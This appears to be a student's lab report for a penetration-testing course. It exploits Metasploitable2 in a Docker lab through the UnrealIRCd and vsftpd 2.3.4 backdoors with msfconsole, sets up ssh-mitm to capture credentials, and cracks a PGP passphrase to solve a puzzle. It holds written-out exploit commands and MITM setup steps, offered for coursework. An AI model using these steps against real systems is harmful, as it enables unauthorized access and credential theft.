OT Lab 2 - Software Testing

:::success # OT Lab 2 - Software Testing Individual assignment with group work parts. Initial tasks distribution: **st number is odd (st7) -> Choice 2** ::: # Choice 2 - Software Vulnerabilities (high-level exploitations) ## Task 1 - Setup infrastructure for penetration testing :::info Setup a minimal network architecture containing at least: * An attacker host (could be your host OS in the goal to save compute resources) * A vulnerable node (ideally with an RCE) * A node that is not vulnerable (kingdom) but that we need to get credentials for (and it’s the network link that is vulnerable) or implement any other techniques to steal sensitive data/get unauthorized access * A isolated network for kingdom or in the DMZ (choose your favorite routing solution) ::: Okay, since most known people for me with the second choice decided to do this lab on Docker, in order to have less problems with the overall configuration of this network, I also use docker. * **tleemcjr/metasploitable2** - the simplest and most vulnerable image of a docker * [simplest guide](https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/) ``` version: '3' services: vulnerable_node: image: tleemcjr/metasploitable2 container_name: vulnerable command: bash -c "./bin/services.sh && while true; do sleep 2; done" networks: - test-network - internal-network #for some manipulation with ssh-mitm vulnerable_node2: image: ubuntu container_name: vulnerable2 command: bash -c "while true; do sleep 2; done" networks: - test-network - internal-network kingdom: image: ubuntu container_name: kingdom command: bash -c "while true; do sleep 2; done" networks: - test-network attacker_host: build: context: . dockerfile: DockerFileAttacker container_name: attacker command: bash -c "while true; do sleep 2; done" networks: - internal-network #Docker Networks networks: test-network: driver: bridge internal-network: driver: bridge ``` ``` FROM ubuntu RUN mkdir /test WORKDIR /test RUN apt update && apt install -y python3 nmap curl net-tools nfs-common git systemctl nano WORKDIR /test ``` ## Task 2 - Make an exploitation :::info Try and validate your chosen software vulnerability to attack a vulnerable node. Example of old good ones working RCE vulnerabilities (you are free to find others and may be newer): * CVE-2015-1635 (IIS) * CVE-2017-0144 - EternalBlue * CVE-2018-1000861 (Jenkins) * CVE-2019-0708 - Bluekeep * CVE-2020-7247 (OpenSMTPD) Explore the environment and networks as much as possible with the given access to vulnerable node. To make a PoC, one vulnerability is enough, but you are free to implement more. ::: <center> ![](https://i.imgur.com/JHA4Ura.png) Figure 1 - nmap scan </center> At first, the nfs vulnerability seemed to me the most interesting vulnerability, I spent a lot of time on it, however, in the case of docker, the problem is somewhere behind the containers and I could not solve it even by rebuilding the network anew, with the addition of an nfs volume, playing with portmapper services (rpcbind.socket, allowing udp connection, failed to start). As you can see above, nmap did not find any open tcp ports for nfs in the scan. [CVE-2010-2075](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075) In this case, I will try to take advantage of the UnrealIRCd 3.2.8.1 vulnerability. It is quite old, but I liked using msfconsole. Some versions of Unreal3.2.8.1.tar.gz on the official mirrors contained a backdoor that allows you to execute any commands with the privileges of the user on whose behalf the ircd is loaded ``` # msfconsole #command search to find module names and then apply msf6 > use unix/irc/unreal_ircd_3281_backdoor msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set TARGET vulnerable TARGET => vulnerable msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST vulnerable RHOST => vulnerable msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 2 payload => cmd/unix/bind_ruby msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set target 0 target => 0 ``` <center> ![](https://i.imgur.com/nhmDc1p.png) Figure 2 - Access inside the shell ![](https://i.imgur.com/7E9UzEX.png) Figure 3 - Process of nmap kingdom </center> ## Task 3 - Attack a non-vulnerable node (kingdom) :::info Next, you are ready to proceed to get access on the internal network of the kingdom. To implement the attack, try to explore with which hacking tools you are able to implement this (may be something about SSH MITM?). Kingdom-PC can be connected to any different from vulnerable node subnet, it doesn't matter. To make a PoC with one working hacking tool/technique is enough. ::: I chose the MITM attack because it was hinted at in the assignment. But I also think that a brute force attack is applicable here, I'll show it a little later, but I won't describe it. ``` #on vulnerable2 apt-get install python3-pip pip install ssh-mitm ssh-mitm server --remote-host kingdom ``` I am using a new (clean) image for a vulnerable server because the meta-exploit behaves too aggressively towards some services and commands. ``` #on kingdom for open ssh-port apt-get install openssh-server systemctl enable ssh systemctl start ssh adduser user [create password] [create other stuff] addgroup user ssh ``` <center> ![](https://i.imgur.com/pk7xSYy.png) Figure 4 - SSH-MITM Implementation </center> Now it is enough for the attacker to connect to the listening port 10022. <center> ![](https://i.imgur.com/pvvKmz8.png) Figure 5 - The Result </center> This is also one of the options, we can get access to both the vulnerable host and through it access to the kingdom by brute force. Although he's not very handsome. <center> ![](https://i.imgur.com/pdQM3VA.png) Figure 5 - SSH brutforce </center> ## Task 4 - Privilege escalation flow (in group by two) :::info In this task you should chose a partner for you who has the same lab choice. 1. Choose privilege escalation scenario and setup a vulnerable node. You can use a vulnerable node from previous tasks. If your previously chosen vulnerability can provide you a privilege escalation attack, so just use it. Otherwise, define another one vulnerability and make it from scratch. 2. Understand the process of chosen vulnerability and describe how it works. 3. Test and validate it. If you do something with privilege escalation in Task 3, just extend the explanations here then. 4. Deliver your vulnerable instance for your partner to attack. ::: One of the simple examples is .rhosts + +, allowing the connection of any node from the same network as the vulnerable node. The $HOME/.rhosts file defines which remote hosts (computers on a network) can invoke certain commands on the local host without supplying a password. This file is a hidden file in the local user's home directory and must be owned by the local user. A + (plus sign) signifies that any host on the network is trusted. <center> ![](https://i.imgur.com/lZtuIlX.png) Figure 6 - .rhosts + + </center> The ingreslock port (1524/TCP) is often used as a backdoor by programs which exploit vulnerable RPC (Remote Procedure Call) services. This port links to a service called ingreslock which is meant to lockdown specific areas of the database application. Inadvertently, ingreslock has a backdoor associated with it that automatically binds when a connection is made with this port. <center> ![](https://i.imgur.com/mMtSfhF.png) Figure 7 - ingreslock backdor </center> In all these cases, I get root rights. :::info 5.1. After you received the partner's vulnerable node image, find out what kind of vulnerability you were proposed by your opponent teammate. It is not necessary to do a black box exploration (surely you are already exhausted by this time), so just agree with your partner about the name of the vulnerability or about other tips. 5.2. Understand the process and describe how it works. 5.3. Hack it. ::: Ivan and I used the same image for the vulnerable host, but he wrote a script for his vulnerability. I'll try to hack it through msfconsole. This is one of the varieties of backdoor ([CVE-2011-2523](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523)). > This vulnerability is a backdoor detected in the service vsftpd version 2.3.4. If a user name ending with the sequence is sent to the service :), the backdoor version will open a listening shell on port 6200, which will be able to execute commands under the root user > > from Ivan's report <center> ![](https://i.imgur.com/dCrZxb1.png) Figure 8 -Needed module </center> ``` msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST vulnerable RHOST => vulnerable ``` <center> ![](https://i.imgur.com/PMt3duB.png) Figure 8 - Result </center> I understand that msfconsole is a fairly simple and primitive way. But if we talk about playback, it will look like this: <center> ![](https://i.imgur.com/iEja0U4.png) Figure 8 - Telnet test </center> I give the login the username ending with a smiley face and these actions open a backdoor on port 6200. I was not able to show the correct output via telnet (it seems to me again that this is a feature of the docker), but it will be like this: ``` id uid=0(root) gid=0(root) ``` This is because two hexadecimal numbers are compared with the array p_buf[i]. 0x3A and 0x29 are ascii characters for ":" and ")" respectively, "smiley". The code snippet iterates through the array and checks the string entered by the user when logging in to the FTP server. If it finds the "smiley" characters in the correct order, it runs the vsf_sysutil_extra() function. <center> ![](https://i.imgur.com/hvrAH8b.png) Figure 9 - [From source code](https://github.com/nikdubois/vsftpd-2.3.4-infected/blob/vsftpd_original/infection.diff) </center> The vsf_sysutil_exe() function sets a TCP socket listening on port 6200, which will launch the shell when connected to the specified port <center> ![](https://i.imgur.com/oiS3ZTp.png) Figure 10 - vsf_sysutil_extra() </center> ## Task 5 - Magic video :::info Let's make some fun at the end. You are given the file. Find out what kind of file is what and retrieve the message. ::: At first glance, it looks like this is an old Elvis Presley music video. However, if we simply open the .avi file in a text notebook, then under all the information about the video we will find two fragments of text in base64 encoding. :::spoiler >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 DX0scQqRx3FFgGoUjJfQRA== --------------------------------------------------- >hQGMAxcYmah/ykbaAQv/YF+v5ElbV8cCtYTmB5yJ4AI2v5+3OUzQaOhC1W1OWn5JqkbPxkQqbfC6 81OKFjSA9L7BWWn2qNnYlmT8Hxu+Ux4CsO1YZHZ1MNJSZHdDIpire9Tplr0fkGO/GLKuSUxq20/7 gJ3AdnqABuEOZzEpXmtgUy1PCVeJjXy4RG8hGsq0/lOf6ry+zeGBMQPDldPVRoEEJIOkvbOSKMfh VoOZMe1LpRbMt1Q14TD6HTghAN+HmEzfZ/sdggFftRev1f9nC6Y6TgCIBTx0y4X/yhvZWc+HKC0s Rc5yBhWtaM66PSfnN3sZKnK4z5fWMMIlvyOUTa1JGNc37ZNqQMB9Sb5HIVrmFJ4Oq5x9OdIY/Gk9 aRVguU3Z79vrPm55gulzX8Mp27DncSQLINmp/zBV8NjC09ip7l3lHcLB32ks+POild/5kGRIcvmn /Z50xcCgOK+orpkPodNOTTVRosTwdBifFPd9PN9cW1vki4WGO+5rZSM5KfC0jGo74Nf1ss1+Bwoo 0k4B1YvEv8aWpZZtdzUqIg5HH2uAHfv480KiOUdHoq7YcGV2N1Q4kcryh26tAmrVu4628qPgG0vO 9rc8/WTNYfRPB2U8c0FYdYDOATvzYaY= ::: Initially, it looked like two messages or a key and some kind of message. I tried to recode base64 to hex, then select an algorithm for the hash. But in the end I came to the conclusion that in terms of the amount of information (more than four thousand bytes) it's more like keys. Therefore, I first designed the first part from the cipher as a gpg-message and with the help of the gpg2john utility I got a hash. ``` #version10.asc -----BEGIN PGP MESSAGE----- Version: GnuPG v1 <long bla-bla-bla from xxx.avi> -----END PGP MESSAGE----- ``` <center> ![](https://i.imgur.com/eAxKRNU.png) ![](https://i.imgur.com/XkNkOIo.png) Figure 11, 12 - GPG/PGP-key </center> I saved the result to a "hash" file and gave it to John. <center> ![](https://i.imgur.com/qz1kchr.png) Figure 13 - passphrase </center> Now you can find the private key and decrypt the message. <center> ![](https://i.imgur.com/5aP4twG.png) Figure 14 - import privat key and decrypt message </center> ### **The answer is: elvissiguevivo** <center> ![](https://i.imgur.com/TmkHrFB.png) Figure 15 - message-file and its header </center> <center> ![](https://i.imgur.com/V0MKk1w.png) Figure 16 - key-file and its header </center> ## References: 1. [IBM: rhosts file](https://www.ibm.com/docs/en/aix/7.2?topic=formats-rhosts-file-format-tcpip) 2. [Metasploit unleashed: msfconsole commands](https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/)